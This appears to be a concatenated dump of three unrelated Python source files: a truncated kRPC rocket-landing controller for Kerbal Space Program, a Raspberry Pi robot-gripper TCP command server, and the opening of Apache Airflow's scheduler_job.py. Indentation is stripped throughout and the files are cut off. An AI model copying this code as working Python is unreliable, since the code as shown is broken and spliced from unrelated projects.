ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki']
ctrl_fall_yaw.kp = params['ctrl_fall_yaw.kp']
pitch_flap = ctrl_fall_pitch.update(pitch_error, game_delta_time) #PID
yaw_flap = ctrl_fall_yaw.update(hdg_error, game_delta_time) #PID
roll_flap = ctrl_fall_roll.update(roll_error, game_delta_time) #PID
#combine_flaps(pitch_flap, roll_flap, roll_error * rad2deg) #
combine_flaps(pitch_flap, yaw_flap)
vessel.control.yaw = yaw_flap
vessel.control.roll = roll_flap
if error[0] < params['start_altitude']: #开始规划路径
#frcount -= 1
if frcount <= 0:
frcount = 1
vessel_profile = get_vessel_profile(vessel)
vessel_state = predict_vessel_state(vessel, params['predict_altitude']) #计算要耗时,所以代入外推预测的未来状态
vessel_final_state = get_final_state(vessel, params['final_height'])
conn.krpc.paused = True # ザ·ワールド
#Thread(target=solve_path, args=(vessel_profile, vessel_state)).start()
solve_path(vessel_profile, vessel_state, vessel_final_state)
conn.krpc.paused = False
if (error[0] <= params['predict_altitude'] and solved_path != None):
n_i = 0
vessel.control.sas = False
vessel.control.rcs = True
nav_mode = 'convex'
retract_flaps()
print('convex')
elif nav_mode == 'convex': #沿路径
(x, uk, tf) = solved_path
mk = x[0, :] #mass
rk = x[1:4, :] # position
vk = x[4:7, :] # vel
qk = x[7:11, :] # quaternion
wk = x[11:14, :] # omega
di = game_delta_time * K/tf
n_i = clamp(find_nearest_index(rk, vk, error), n_i + di * 0.5, n_i + di * 1.5)
#n_i = max(n_i - game_delta_time * 0.2 * K/tf, find_nearest_index(rk, vk, error)) #找到当前最近轨迹位置
#print(game_delta_time)
(r_i, v_i, q_i, u_i) = sample_index(n_i, rk, vk, qk, uk) #规划的位置速度
(r_i_, v_i_, q_i_, u_i_) = sample_index(n_i + 0.4 * K/tf, rk, vk, qk, uk) #预测一小段时间以后
q_i_mat = rotation_mat(q_i) #local到target系旋转
q_i_mat_ = rotation_mat(q_i_)
u_i = transform(u_i, q_i_mat) #变换到target系
u_i_ = transform(u_i_, q_i_mat_)
head_i = transform(vec(1, 0, 0), q_i_mat)
head_i_ = transform(vec(1, 0, 0), q_i_mat_)
#
target_a = npl.norm(u_i) / mass * head_i + (v_i - vel) * k_v + (r_i - error) * k_x
target_a_ = npl.norm(u_i_) / mass * head_i_ + (v_i - vel) * k_v + (r_i - error) * k_x
if debug_lines: #画采样指示线
target_line.start = error
target_line.end = (r_i[0], r_i[1], r_i[2])
target2_line.start = error
target2_line.end = (r_i_[0], r_i_[1], r_i_[2])
#最大/最小加速度
max_throttle_ctrl = throttle_limit_ctrl[1] * (max_thrust / mass)
min_throttle_ctrl = throttle_limit_ctrl[0] * (max_thrust / mass)
#目标变换到local系 clamp后变回来
target_a = transform(target_a, q_i_mat.T)
target_a = conic_clamp(target_a, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a = transform(target_a, q_i_mat)
target_a_ = transform(target_a_, q_i_mat_.T)
target_a_ = conic_clamp(target_a_, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a_ = transform(target_a_, q_i_mat_)
#方向按预测,大小按当前
target_direction = target_a_ / npl.norm(target_a_)
target_throttle = npl.norm(target_a) / (max_thrust / mass)
#print(target_a)
if debug_lines: #画目标朝向线
head_line.start = error
head_line.end = error + target_direction * 20
if n_i > 0:
vessel.control.throttle = target_throttle
# if (K - n_i) * tf / K < 6: #提前开起落架
# vessel.control.gear = True
if npl.norm(error[1:3]) < params['final_radius'] and npl.norm(error[0]) < params['final_height']: #进入最终落区
vessel.control.gear = not vessel.control.gear
[g.set_field_float('Gimbal Limit', 20) for g in engine_gimbal] # 防止震荡
print('final')
nav_mode = 'final'
elif nav_mode == 'final':
max_acc = throttle_limit_ctrl[1] * (max_thrust / mass) - g0
max_acc_low = throttle_limit_ctrl[1] * final_throttle * (max_thrust / mass) - g0
est_h = error[0] - vel[0]**2 / (2 * max_acc) #低推力预测预留高度
est_h_low = error[0] - vel[0]**2 / (2 * max_acc_low) #全推力预测预留高度
est_h_center = (est_h + est_h_low) / 2
#比例反馈
vessel.control.throttle = clamp(lerp(throttle_limit_ctrl[1] * final_throttle, throttle_limit_ctrl[1], -est_h_low / (est_h - est_h_low) * (1+final_kp)), throttle_limit_ctrl[1], throttle_limit_ctrl[0])
#水平控制
error_hor = v3(0, error[1], error[2])
vel_hor = v3(0, vel[1], vel[2])
ctrl_hor = -error_hor * params['final_hor_kp'] - vel_hor * params['final_hor_kv']
target_direction = ctrl_hor + v3(1, 0, 0)
target_direction /= npl.norm(target_direction)
target_direction = conic_clamp(target_direction, 1, 1, max_tilt)
else: #none 初始化
nav_mode = 'launch'
if (max_thrust == 0):
vessel.control.activate_next_stage()
vessel.control.rcs = True
vessel.control.gear = not vessel.control.gear
continue
#target_direction = -vel
#vessel.control.throttle = 0
# 变换到机体坐标系计算姿态控制,以下xyz均指机体系
if nav_mode in ['final', 'convex', 'launch', 'transit']:
target_direction_local = transform(target_direction, rotation_srf2local) # 机体系的目标姿态的机体y轴指向
avel_local = transform(avel, rotation_srf2local) # 机体系角速度
# 三个轴方向能提供的最大角加速度
#authority_local = (torque + torque_k * vessel.control.throttle) / moment_of_inertia_local
#authority_local = np.abs(vec(vessel.available_torque[0])) / moment_of_inertia_local
#ctrl_x_rot.unified_authority = authority_local[0]
#ctrl_z_rot.unified_authority = authority_local[2]
# pid控制,roll直接消除角速度
#control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), avel_local[0]), 1, -1)
#control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), avel_local[2]), 1, -1)
control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), game_delta_time), 1, -1)
control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), game_delta_time), 1, -1)
control_roll = clamp(avel_local[1] * ctrl_y_avel_kp, 1, -1)
vessel.control.pitch = control_pitch
vessel.control.yaw = control_yaw
vessel.control.roll = control_roll
# 终止条件
if nav_mode == 'final':
if (npl.norm(error[1:3]) < 3 and npl.norm(error[0]) < 1 and npl.norm(vel[1:3]) < 0.3 and npl.norm(vel[0]) < 0.5 and npl.norm(avel) < 0.2) or (vel[0] > 0 and npl.norm(error[0]) < 1):
print('exit')
vessel.control.throttle = 0
break
prev_vel = vel
game_prev_time = ut |
remoteControlThread.py | #!/usr/bin/python
import socket
import sys
import os.path
import fcntl
import struct
import serial
import threading
import time
from Gripper import Gripper
# Move Specified Gripper to Specified Angle (-180, 180)
myGripper = Gripper()
# Make sure the script is run as sudo
if not os.geteuid() == 0:
sys.exit("\nOnly root can run this script\n")
udG = 0
rotG = 1
yG = 2
cG = 3
# Set up the USB connection to the Arduino. This will error
# if a USB cord is not connected.
usbOptions = ['/dev/ttyUSB0', '/dev/ttyUSB1', '/dev/ttyUSB2']
usbOptions = filter(os.path.exists, usbOptions)
assert(len(usbOptions) == 1)
usbPort = usbOptions[0]
mes = "Q"
num = 0
# Cute trick to get the local IP address from wlan0 (wireless)
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
# Recieve the data being transmitted.
def recvall(sock, length):
data = ''
while len(data) < length:
more = sock.recv(length - len(data))
if not more:
raise EOFError('socket closed %d bytes into a %d-byte message'
% (len(data), length))
data += more
return data
# Set up and listen for commands.
# def myTCPServer(endSymbol):
# HOST = get_ip_address('wlan0')
# PORT = 1160
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# s.bind((HOST, PORT))
# s.listen(5)
# print "Waiting for connection. Listening to port ", str(PORT)
# client, addr = s.accept()
# print "Accepted connection from: ", addr
# while True:
# client, addr = s.accept()
# print "Accepted connection from: ", addr
# message = recvall(client, 6)
# client.close()
# if message[0] == 'S':
# client.close()
# print "Communication Closed!"
# break
# print "Message Recieved: " + message #Debug print
# # Get's the commands from the message to see if they are for the
# # gripper.
# parseMessage(message)
# usb.flush()
# usb.write(message) #Write the message recieved to the Arduino.
# usb.flush()
# Set up and listen for commands.
def myTCPServer(endSymbol):
HOST = get_ip_address('wlan0')
PORT = 1160
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(5)
print("Waiting for connection. Listening to port " + str(PORT))
client, addr = s.accept()
print("Accepted connection from: " + addr)
while True:
client, addr = s.accept()
print("Accepted connection from: " + addr)
message = []
while ':' not in message:
message.append(client.recv(1))
message = ''.join(message[:])
client.close()
if message[0] == 'S':
client.close()
print("Communication Closed!")
break
print("Message Recieved: " + message) # Debug print.
# Get's the commands from the message to see if they are for the
# gripper.
parseMessage(message)
usb.flush()
usb.write(message) # Write the message recieved to the Arduino.
usb.flush()
# Move Specified Gripper to Specified Angle (-180,180)
def gripperMove(servo, angle):
"""
Function containing a threading wrapper for gripperMove module of the
Gripper class.
Parameters
----------
servo : int
Servo on the gripper needing to be moved.
angle : float
Desired angle for the servo to move.
"""
thread = threading.Thread(
target=myGripper.gripperMove, args=(servo, angle))
thread.start()
def parseMessage(x):
global mes
global num
mes = x[0]
num = int(x[2:-1])
def gripperClose():
""" Close the mandibles. """
gripperMove(3, -180)
def gripperOpen():
""" Open the mandibles. """
gripperMove(3, 0)
def gripperAction(strInput, numInput):
if strInput == "A":
if numInput == 000:
gripperClose()
if numInput == 001:
gripperOpen()
elif strInput == "H":
gripperMove(udG, numInput)
elif strInput == "T":
gripperMove(yG, numInput)
elif strInput == "Y":
gripperMove(rotG, numInput)
# Open the communication thread
print("Communication Thread Started.")
communication = threading.Thread(target=myTCPServer, args=(":"))
communication.start()
# Main loop.
while True:
try:
usb = serial.Serial(usbPort, 9600, timeout=10)
usb.open()
# Put the gripper in the initial configuration defined in Gripper
# class.
myGripper.gripperInitial()
time.sleep(2) # give the serial time to get opened
print("USB Connection Initialized.")
except serial.SerialException:
myGripper.allOff() # Turns off all the gripper servos.
os.system("sudo killall servod") # Kills the servod program.
temp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
temp.connect((get_ip_address('wlan0'), 1160))
temp.sendall("S:")
temp.close()
sys.exit("USB connection not found (Is the USB cord plugged in?)")
while True:
try:
gripperAction(mes, num)
print("Command: " + mes + " Number: " + str(num))
time.sleep(0.1) # Thread can execute too fast for communication?
except KeyboardInterrupt:
myGripper.allOff() # Turns off all the gripper servos.
os.system("sudo killall servod") # Kills the servod program.
temp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
temp.connect((get_ip_address('wlan0'), 1160))
temp.sendall("S:")
temp.close()
sys.exit("Successfully Exited Main Loop")
# End script if inner while loop ends.
break
|
scheduler_job.py | # pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_, tuple_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, SerializedDagNotFound, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.event_scheduler import EventScheduler
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.retries import MAX_DB_RETRIES, retry_db_transaction, run_with_db_retries
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if task.sla and not isinstance(task.sla, timedelta):
raise TypeError(
f"SLA is expected to be timedelta object, got "
f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
)
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
blocking_task_list = "\n".join(
ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure_with_callback(error=request.msg, test_mode=ti.test_mode)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
